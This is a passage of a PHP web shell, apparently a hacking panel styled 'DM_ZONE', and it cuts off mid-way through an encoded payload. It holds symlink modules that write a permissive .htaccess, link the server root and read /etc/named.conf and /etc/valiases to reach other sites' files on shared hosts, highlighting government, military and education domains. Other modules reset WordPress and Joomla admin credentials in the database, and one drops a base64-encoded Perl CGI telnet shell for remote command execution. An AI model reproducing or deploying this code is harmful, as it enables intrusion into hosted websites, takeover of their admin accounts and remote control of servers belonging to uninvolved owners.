- Require None \n
- Satisfy Any";
- $masuk =@fopen ('dm4sym/.htaccess','w');
- fwrite($masuk ,$sempak);
- @symlink('/','dm4sym/dm.txt');
- $pg = basename(__FILE__);
- if(is_readable("/etc/named.conf")){
- echo '<center><br/><br/><nobr><b><span class="b7">O=:[ SYMLINK</span> <span class="b8">ETC/NAMED.CONF ]:=O</span></b></nobr><br/><br/> <table align="center" border="3" width="400" cellspacing="0" cellpadding="4">';
- echo '<tr>
- <td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
- <td align="center"> <font color="white"> <b>_USERS_</b></td>
- <td align="center"> <font color="white"> <b>_SYMLINK_</b></td>';
- $named = file_get_contents("/etc/named.conf");
- preg_match_all('%zone \"(.*)\" {%',$named,$domains);
- foreach($domains[1] as $domain){
- $domain = trim($domain);
- $i += 1;
- $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
- echo "<tr>
- <td><a class='dm' href='http://".$domain." '>".$domain."</a></td>
- <td align='center'><font color='white'>".$owner['name']."</font></td>
- <td align='center'><a href='dm4sym/dm.txt".$owner['dir']."/public_html' target='_blank'>Symlink</a></td>";
- }
- flush();
- flush();
- }
- echo "</tr></table></div></html>";
- }
- # x=dmsym5
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsym5')) {
- @session_start();
- @set_time_limit(0);
- @error_reporting(0);
- @ini_set('log_errors',0);
- @ini_set('error_log',NULL);
- @ini_set('max_execution_time',0);
- if($win){
- echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
- }
- @mkdir('dm5sym',0777);
- $sempak = "Options all \n
- DirectoryIndex dm.html \n
- AddType text/plain .php \n
- AddHandler server-parsed .php \n
- AddType text/plain .html \n
- AddHandler txt .html \n
- Require None \n
- Satisfy Any";
- $masuk =@fopen ('dm5sym/.htaccess','w');
- fwrite($masuk ,$sempak);
- @symlink('/','dm5sym/dm.txt');
- $pg = basename(__FILE__);
- $read_named_conf = @file('/etc/named.conf');
- if(!$read_named_conf) {
- echo "<center><br/><br/><nobr><span class='b9'>Can't Read File etc/named.conf :(</span></nobr><br/><br/>";
- } else {
- echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ SYMLINK</span> <span class='b8'>ETC/NAMED.CONF II ]:=O</span></b></nobr><br/><br/> <table border='3' bordercolor='#FF0000' width='400' cellpadding='1' cellspacing='0'>
- <td align='center'> <font color='white'> <b>_DOMAINS_</b></td>
- <td align='center'> <font color='white'> <b>_USERS_</b></td>
- <td align='center'> <font color='white'> <b>_SYMLINK_</b></td>";
- foreach($read_named_conf as $subject){
- if(eregi('zone',$subject)){
- preg_match_all('#zone"(.*)"#',$subject,$string);
- flush();
- if(strlen(trim($string[1][0])) >2){
- $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
- $name = $UID['name'] ;
- @symlink('/','dm5sym/dm.txt');
- $name = $string[1][0];
- $australia = '\.au';
- $bangladesh = '\.bd';
- $brazil ='\.br';
- $malaysia = '\.my';
- $myanmar = '\.mm';
- $indonesia = '\.id';
- $israel = '\.il';
- $romania = '\.ro';
- $edu = '\.edu';
- $gov = '\.gov';
- $go = '\.go';
- $gob = '\.gob';
- $mil = '\.mil';
- if (eregi("$australia",$string[1][0]) or eregi("$bangladesh",$string[1][0]) or eregi("$brazil",$string[1][0]) or eregi("$malaysia",$string[1][0])or eregi("$myanmar",$string[1][0]) or eregi ("$indonesia",$string[1][0]) or eregi ("$israel",$string[1][0]) or eregi ("$romania",$string[1][0]) or eregi("$edu",$string[1][0]) or eregi("$gov",$string[1][0]) or eregi("$go",$string[1][0]) or eregi("$gob",$string[1][0]) or eregi("$mil",$string[1][0]) or eregi ("$mil2",$string[1][0]))
- { $name = "<div style=' color:yellow ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>'; }
- echo "<tr>
- <td><a class='dm' target='_blank' href=http://".$string[1][0].'/>'.$name.' </a></center></div></td>
- <td align=center><font color=white>'.$UID['name']."</td>
- <td align=center><a href='dm5sym/dm.txt/home/".$UID['name']."/public_html/' target='_blank'>Symlink </a></td></tr>";
- flush();
- }}}}
- flush();
- flush();
- echo "</tr></table></div></html>";
- }
- # x=dmsym6
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsym6')) {
- @session_start();
- @set_time_limit(0);
- @error_reporting(0);
- @ini_set('log_errors',0);
- @ini_set('error_log',NULL);
- @ini_set('max_execution_time',0);
- if($win){
- echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
- }
- @mkdir('dm6sym',0777);
- $sempak = "Options all \n
- DirectoryIndex dm.html \n
- AddType text/plain .php \n
- AddHandler server-parsed .php \n
- AddType text/plain .html \n
- AddHandler txt .html \n
- Require None \n
- Satisfy Any";
- $masuk =@fopen ('dm5sym/.htaccess','w');
- fwrite($masuk ,$sempak);
- @symlink('/','dm6sym/dm.txt');
- $pg = basename(__FILE__);
- if(is_readable("/etc/valiases")){
- echo '<center><br/><br/><nobr><b><span class="b7">O=:[ SYMLINK</span> <span class="b8">ETC/VALIASES ]:=O</span></b></nobr><br/><br/> <table align="center" border="3" width="300" cellspacing="0" cellpadding="4">';
- echo '<tr>
- <td align="center"><font color="white"> <b>_DOMAINS_</b></td>
- <td align="center"><font color="white"> <b>_USERS_</b></td>
- <td align="center"><font color="white"> <b>SYMLINK</b></td>';
- $list = scandir("/etc/valiases");
- foreach($list as $domain){
- $i += 1;
- $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
- echo "<tr>
- <td><a class='dm' href='http://".$domain." '>".$domain."</a></td>
- <td align='center'><font color='white'>".$owner['name']."</font></td>
- <td align='center'><a href='dm6sym/dm.txt".$owner['dir']."/public_html' target='_blank'>Symlink</a>/td>";
- }
- flush();
- flush();
- }
- echo "</tr></table></div></html>";
- }
- # x=wp3
- elseif(isset($_GET['x']) && ($_GET['x'] == 'wp3')) {
- echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ WORDPRESS</span> <span class='b8'>PASS CHANGER ]:=O</span></b></nobr><br/><br/> ";
- if(empty($_POST['pwd'])){
- echo "<FORM method='POST'>
- <table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td> Host</td><td>
- <input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td> Database</td><td>
- <input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td> username</td><td>
- <input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td> password</td><td>
- <input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
- <tr><td> User baru</td><td>
- <input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
- <tr><td> Pass Baru</td><td>
- <input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />
- <input style='width:19%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
- </td></tr> </table><br><br><br><br>
- ";
- }else{
- $localhost = $_POST['localhost'];
- $database = $_POST['database'];
- $username = $_POST['username'];
- $password = $_POST['password'];
- $pwd = $_POST['pwd'];
- $admin = $_POST['admin'];
- @mysql_connect($localhost,$username,$password) or die(mysql_error());
- @mysql_select_db($database) or die(mysql_error());
- $hash = crypt($pwd);
- $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
- $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
- $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
- $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
- $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
- $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
- $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
- if($a4s){
- echo "<br><br><b><nobr><span class='b11'> Password Change Successfully</span></nobr></b><br/>";
- }
- }
- echo "</div>";
- }
- # x=jm4
- elseif(isset($_GET['x']) && ($_GET['x'] == 'jm4')) {
- echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ JOOMLA</span> <span class='b8'>PASS CHANGER ]:=O</span></b></nobr><br/><br/> ";
- if(empty($_POST['pwd'])){
- echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td> Host</td><td>
- <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr>
- <tr><td> Database</td><td>
- <input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr>
- <tr><td> username</td><td>
- <input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr>
- <tr><td> password</td><td>
- <input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
- <tr><td> New User</td><td>
- <input style='width:270px;' class='inputz' name='admin' value='admin' /></td></tr>
- <tr><td> New Pass </td>
- <td>123456 = <input style='width:160px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' /> </td></tr>
- <tr><td><input style='width:130%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
- </td></tr></table><br>";
- } else {
- $localhost = $_POST['localhost'];
- $database = $_POST['database'];
- $username = $_POST['username'];
- $password = $_POST['password'];
- $pwd = $_POST['pwd'];
- $admin = $_POST['admin'];
- @mysql_connect($localhost,$username,$password) or die(mysql_error());
- @mysql_select_db($database) or die(mysql_error());
- $hash = crypt($pwd);
- $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
- $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
- $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
- $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
- $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
- $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
- $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
- $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
- if($SQL){
- echo "<br><br><b><nobr><span class='b11'> Password Change Successfully</span></nobr></b><br/>";
- }
- }
- echo "</div>";
- }
- # x=cgi2012
- elseif(isset($_GET['x']) && ($_GET['x'] == 'cgi2012')) {
- echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ CGI TELNET</span> <span class='b8'> 2012 ]:=O</span></b></nobr><br/><br/> ";
- echo "</br></br><center><b><span class='b11'> You Can Go To : <a href='telnet/telnet.cok' target='_blank'>[+] HERE [+]</a></center></span></br>";
- mkdir('telnet', 0755);
- chdir('telnet');
- $htcok = ".htaccess";
- $htaccesscok = "$htcok";
- $file = fopen($htaccesscok , 'w');
- $cacad = "AddHandler cgi-script .cok";
- fwrite ($file ,$cacad);
- fclose ($file);
- $cgi2012 = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQp1c2UgTUlNRTo6QmFzZTY0Ow0KJFZlcnNpb249ICJDR0ktVGVsbmV0IFZlcnNpb24gMS4zIjsNCiRFZGl0UGVyc2lvbj0iPGZvbnQgc3R5bGU9J3RleHQtc2hhZG93OiAwcHggMHB4IDZweCByZ2IoMjU1LCAwLCAwKSwgMHB4IDBweCA1cHggcmdiKDMwMCwgMCwgMCksIDBweCAwcHggNXB4IHJnYigzMDAsIDAsIDApOyBjb2xvcjojZmZmZmZmOyBmb250LXdlaWdodDpib2xkOyc+RE1fWk9ORTwvZm9udD4iOw0KDQokUGFzc3dvcmQgPSAiYW51IjsJCQkNCgkJCQkNCnN1YiBJc19XaW4oKXsNCgkkb3MgPSAmdHJpbSgkRU5WeyJTRVJWRVJfU09GVFdBUkUifSk7DQoJaWYoJG9zID1+IG0vd2luL2kpew0KCQlyZXR1cm4gMTsNCgl9DQoJZWxzZXsNCgkJcmV0dXJuIDA7DQoJfQ0KfQ0KJFdpbk5UID0gJklzX1dpbigpOwkJCQkjIFlvdSBuZWVkIHRvIGNoYW5nZSB0aGUgdmFsdWUgb2YgdGhpcyB0byAxIGlmDQoJCQkJCQkJCSMgeW91J3JlIHJ1bm5pbmcgdGhpcyBzY3JpcHQgb24gYSBXaW5kb3dzIE5UDQoJCQkJCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91DQoJCQkJCQkJCSMgY2FuIGxlYXZlIHRoZSB2YWx1ZSBhcyBpdCBpcy4NCg0KJE5UQ21kU2VwID0gIiYiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcw0KCQkJCQkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFdpbmRvd3MgTlQuDQoNCiRVbml4Q21kU2VwID0gIjsiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcw0KCQkJCQkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFVuaXguDQoNCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTAwMDA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkDQoJCQkJCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzDQoJCQkJCQkJCSMgdXNlZnVsIGZvciBjb21tYW5kcyB0aGF0IG1heSBoYW5nIG9yIHRoYXQNCgkJCQkJCQkJIyB0YWtlIHZlcnkgbG9uZyB0byBleGVjdXRlLCBsaWtlICJmaW5kIC8iLg0KCQkJCQkJCQkjIFRoaXMgaXMgdmFsaWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzDQoJCQkJCQkJCSMgaWdub3JlZCBvbiBOVCBTZXJ2ZXJzLg0KDQokU2hvd0R5bmFtaWNPdXRwdXQgPSAxOwkJCSMgSWYgdGhpcyBpcyAxLCB0aGVuIGRhdGEgaXMgc2VudCB0byB0aGUNCgkJCQkJCQkJIyBicm93c2VyIGFzIHNvb24gYXMgaXQgaXMgb3V0cHV0LCBvdGhlcndpc2UNCgkJCQkJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kDQoJCQkJCQkJCSMgY29tcGxldGVzLiBUaGlzIGlzIHVzZWZ1bCBmb3IgY29tbWFuZHMgbGlrZQ0KCQkJCQkJCQkjIHBpbmcsIHNvIHRoYXQgeW91IGNhbiBzZWUgdGhlIG91dHB1dCBhcyBpdA0KCQkJCQkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4NCg0KIyBET04nVCBDSEFOR0UgQU5ZVEhJTkcgQkVMT1cgVEhJUyBMSU5FIFVOTEVTUyBZT1UgS05PVyBXSEFUIFlPVSdSRSBET0lORyAhIQ0KDQokQ21kU2VwID0gKCRXaW5OVCA/ICROVENtZFNlcCA6ICRVbml4Q21kU2VwKTsNCiRDbWRQd2QgPSAoJFdpbk5UID8gImNkIiA6ICJwd2QiKTsNCiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOw0KJFJlZGlyZWN0b3IgPSAoJFdpbk5UID8gIiAyPiYxIDE+JjIiIDogIiAxPiYxIDI+JjEiKTsNCiRjb2xzPSAxNTA7DQokcm93cz0gMjY7DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJzZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQNCiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlwYXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4NCiMgVGhlIGZpbGVuYW1lIGlzIHN0b3JlZCBpbiAkaW57J2YnfSBhbmQgdGhlIGRhdGEgaXMgc3RvcmVkIGluICRpbnsnZmlsZWRhdGEnfS4NCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAkaW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YNCiMgdGhlIHZhcmlhYmxlLiBOb3RlOiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBDR0kNCiMgc2NyaXB0cy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBSZWFkUGFyc2UgDQp7DQoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsNCglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwpOw0KCQ0KCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOw0KDQoJaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiR0VUIikNCgl7DQoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KCX0NCgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikNCgl7DQoJCWJpbm1vZGUoU1RESU4pIGlmICRNdWx0aXBhcnRGb3JtRGF0YSAmICRXaW5OVDsNCgkJcmVhZChTVERJTiwgJGluLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCgl9DQoNCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBkYXRhDQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pDQoJew0KCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZlciB0byBSRkMxODY3IA0KCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyANCgkJJEhlYWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0KCQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMgdGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87IA0KCQkkaW57J2YnfSA9ICQxOyANCgkJJGlueydmJ30gPX4gcy9cIi8vZzsNCgkJJGlueydmJ30gPX4gcy9ccy8vZzsNCg0KCQkjIHBhcnNlIHRyYWlsZXINCgkJZm9yKCRpPTI7ICRsaXN0WyRpXTsgJGkrKykNCgkJeyANCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIvOw0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxufFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOyANCgkJfQ0KCX0NCgllbHNlICMgc3RhbmRhcmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkNCgl7DQoJCUBpbiA9IHNwbGl0KC8mLywgJGluKTsNCgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQ0KCQl7DQoJCQkkaW5bJGldID1+IHMvXCsvIC9nOw0KCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsNCgkJCSRrZXkgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRlZmluZWQoJGlueyRrZXl9KSk7DQoJCQkkaW57JGtleX0gLj0gJHZhbDsNCgkJfQ0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgUGFnZSBIZWFkZXINCiMgQXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUhlYWRlcg0Kew0KCSRFbmNvZGVkQ3VycmVudERpciA9ICRDdXJyZW50RGlyOw0KCSRFbmNvZGVkQ3VycmVudERpciA9fiBzLyhbXmEtekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJbXkgJGRpciA9JEN1cnJlbnREaXI7DQoJJGRpcj1+IHMvXFwvXFxcXC9nOw0KCXByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOw0KCXByaW50IDw8RU5EOw0KPGh0bWw+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04Ij4NCjx0aXRsZT5DR0kgVEVMTkVUPC90aXRsZT4NCg0KJEh0bWxNZXRhSGVhZGVyDQoNCjwvaGVhZD4NCjxzdHlsZT4NCmJvZHl7DQpmb250OiAxMHB0IFZlcmRhbmE7DQp9DQp0ciB7DQpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLUxFRlQ6ICAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsNCmNvbG9yOiAjZmY5OTAwOw0KfQ0KdGQgew0KQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItVE9QOiAgICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7DQpjb2xvcjogIzJCQThFQzsNCmZvbnQ6IDEwcHQgVmVyZGFuYTsNCn0NCg0KdGFibGUgew0KQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItVE9QOiAgICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7DQpCQUNLR1JPVU5ELUNPTE9SOiAjMTExOw0KfQ0KDQoNCmlucHV0IHsNCkJPUkRFUi1SSUdIVDogICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1CT1RUT006ICMzZTNlM2UgMXB4IHNvbGlkOw0KQkFDS0dST1VORC1DT0xPUjogQmxhY2s7DQpmb250OiAxMHB0IFZlcmRhbmE7DQpjb2xvcjogI2ZmOTkwMDsNCn0NCg0KaW5wdXQuc3VibWl0IHsNCnRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsNCmNvbG9yOiAjRkZGRkZGOw0KYm9yZGVyLWNvbG9yOiAjMDA5OTAwOw0KfQ0KDQpjb2RlIHsNCmJvcmRlcgkJCTogZGFzaGVkIDBweCAjMzMzOw0KQkFDS0dST1VORC1DT0xPUjogQmxhY2s7DQpmb250OiAxMHB0IFZlcmRhbmEgYm9sZDsNCmNvbG9yOiB3aGlsZTsNCn0NCg0KcnVuIHsNCmJvcmRlcgkJCTogZGFzaGVkIDBweCAjMzMzOw0KZm9udDogMTBwdCBWZXJkYW5hIGJvbGQ7DQpjb2xvcjogI0ZGMDBBQTsNCn0NCg0KdGV4dGFyZWEgew0KQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItVE9QOiAgICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7DQpCQUNLR1JPVU5ELUNPTE9SOiAjMWIxYjFiOw0KZm9udDogRml4ZWRzeXMgYm9sZDsNCmNvbG9yOiAjYWFhOw0KfQ0KQTpsaW5rIHsNCglDT0xPUjogIzJCQThFQzsgVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOnZpc2l0ZWQgew0KCUNPTE9SOiAjMkJBOEVDOyBURVhULURFQ09SQVRJT046IG5vbmUNCn0NCkE6aG92ZXIgew0KCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsNCgljb2xvcjogI2ZmOTkwMDsgVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmFjdGl2ZSB7DQoJY29sb3I6IFJlZDsgVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQoNCi5saXN0ZGlyIHRyOmhvdmVyew0KCWJhY2tncm91bmQ6ICM0NDQ7DQp9DQoubGlzdGRpciB0cjpob3ZlciB0ZHsNCgliYWNrZ3JvdW5kOiAjNDQ0Ow0KCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsNCgljb2xvcjogI0ZGRkZGRjsgVEVYVC1ERUNPUkFUSU9OOiBub25lOw0KfQ0KLm5vdGxpbmV7DQoJYmFja2dyb3VuZDogIzExMTsNCn0NCi5saW5lew0KCWJhY2tncm91bmQ6ICMyMjI7DQp9DQo8L3N0eWxlPg0KPHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQpmdW5jdGlvbiBjaG1vZF9mb3JtKGksZmlsZSkNCnsNCgkvKnZhciBhamF4PSdhamF4X1Bvc3REYXRhKCJGb3JtUGVybXNfJytpKyciLCIkU2NyaXB0TG9jYXRpb24iLCJSZXNwb25zZURhdGEiKTsgcmV0dXJuIGZhbHNlOyc7Ki8NCgl2YXIgYWpheD0iIjsNCglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZVBlcm1zXyIraSkuaW5uZXJIVE1MPSI8Zm9ybSBuYW1lPUZvcm1QZXJtc18iICsgaSsgIiBhY3Rpb249JycgbWV0aG9kPSdQT1NUJz48aW5wdXQgaWQ9dGV4dF8iICsgaSArICIgIG5hbWU9Y2htb2QgdHlwZT10ZXh0IHNpemU9NSAvPjxpbnB1dCB0eXBlPXN1Ym1pdCBjbGFzcz0nc3VibWl0JyBvbmNsaWNrPSciICsgYWpheCArICInIHZhbHVlPU9LPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOw0KCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJ0ZXh0XyIgKyBpKS5mb2N1cygpOw0KfQ0KZnVuY3Rpb24gcm1fY2htb2RfZm9ybShyZXNwb25zZSxpLHBlcm1zLGZpbGUpDQp7DQoJcmVzcG9uc2UuaW5uZXJIVE1MID0gIjxzcGFuIG9uY2xpY2s9XFxcImNobW9kX2Zvcm0oIiArIGkgKyAiLCciKyBmaWxlKyAiJylcXFwiID4iKyBwZXJtcyArIjwvc3Bhbj48L3RkPiI7DQp9DQpmdW5jdGlvbiByZW5hbWVfZm9ybShpLGZpbGUsZikNCnsNCgl2YXIgYWpheD0iIjsNCglmLnJlcGxhY2UoL1xcXFwvZywiXFxcXFxcXFwiKTsNCgl2YXIgYmFjaz0icm1fcmVuYW1lX2Zvcm0oIitpKyIsXFxcIiIrZmlsZSsiXFxcIixcXFwiIitmKyJcXFwi